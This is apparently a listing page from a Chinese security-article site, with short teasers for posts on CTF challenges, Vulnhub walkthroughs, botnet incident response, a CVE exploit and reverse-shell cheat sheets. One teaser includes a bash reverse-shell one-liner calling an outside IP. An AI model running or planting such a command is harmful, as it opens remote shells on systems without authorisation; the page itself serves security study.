声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与...
05月08日270 views评论java
公众号
Burpsuite专业版安装(保姆级)教程
05月08日270 views评论java
公众号
05月08日270 views评论java
公众号
警惕:Linux 系统异常缓慢?你可能已陷入 Xor.DDoS 僵尸网络
近期,千里目安全实验室响应了多起 Linux 安全应急事件,在这些事件中被感染的服务器呈现的普遍现象是网络带宽被发送的大量异常数据包所占用,导致网络异常缓慢。经检测发现,这些现象大部分都是由 Xor....
05月06日49 views评论linux
攻击者
皮蛋厂的学习日记 | 2022.4.24 有关 *CTF ezRSA一点思考&文件上传漏洞
皮蛋厂的学习日记系列为山东警察学院网安社成员日常学习分享,希望能与大家共同学习、共同进步~2021级 Mu.Chen |有关 *CTF ezRSA一点思考前言缘起深入重点2021级 Will1am |...
04月25日112 views评论ctf
import
常用反弹shell方法总结
0x01 bash反弹shellbash -i >&/dev/tcp/1.1.1.1/9999 0>&1解释:bash -i [interface] 表示启动sh...
04月25日1,113 views评论shell
windows
CVE-2017-11885 EXP
#!/usr/bin/env python # -*- coding: utf-8 -*- #Tested in Windows Server 2003 SP2 (ES) - Only works w...
04月23日安全文章31 views评论cve
import
红队笔记专属-shell备忘录
前言: 建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到,这是整理的一些常见的反向shell和特权提升的笔记文档,红队成员必会! 最全。 反向shell-备忘录: 通常在获得远程代码执行之后,我们希...
04月16日SecIN安全技术社区82 views红队笔记专属-shell备忘录已关闭评论ip
tcp
How I hacked an ESA's experimental satellite(译文)
0x00 背景 免责声明:早在两个月之前,我们就已经将文中介绍的漏洞提交给了ESA;目前,这些漏洞已经得到了修复。同时,本文发表前已经通过了ESA的评审,并允许公之于众。 Hacking satell...
04月15日31 views评论file
string
Vulnhub笔记-jigsaw
去年做过一个叫jigsaw的靶机,当时太菜了没有没搞进去,最后是按照WriteUp操作的,这个靶机涉及的知识和技巧让我印象深刻。所以打算再次尝试下,主要还是想把自己上次没做...
04月15日58 views评论flag
vulnhub
每周一插 | 如果家用监控被黑会怎么样?
摘要:本次给大家分享的是四叶草安全漏洞插件社区成员“卍 ”童鞋提交的“普顺达摄像机/web/cgi-bin/hi3510/param.cgi未授权访问”01普顺达 作为目前国内网络摄像机种类...
04月14日118 views评论bin
web
【技术分享】Kernel pwn CTF 入门 - 1
01简介内核 CTF 入门,主要参考 CTF-Wiki。 02环境配置调试内核需要一个优秀的 gdb 插件,这里选用 gef。根据其他师傅描述,peda 和 pwndbg 在调试内核时会有很...
04月13日35 views评论ctf
linux
Vulnhub笔记-bottleneck
闲着也没事儿干接着搞靶机,既能陶冶情操修身养性,又能平复心情增长见识。靶机名:bottleneck难度:中级按照正常套路来,探测网段内的存活主机,这里使用arp-scan来对网段内主机进行arp扫描。...
04月13日95 views评论nmap
www
皮蛋厂的学习日记 | 2022.4.13 跟上时代之高版本GLIBC下堆利用(二)
皮蛋厂的学习日记系列为山东警察学院网安社成员日常学习分享,希望能与大家共同学习、共同进步~2020级 大能猫 | 跟上时代之高版本GLIBC下堆利用(二)前言介绍前置知识讲解Tcache Stashi...
04月13日65 views评论bin
stack
14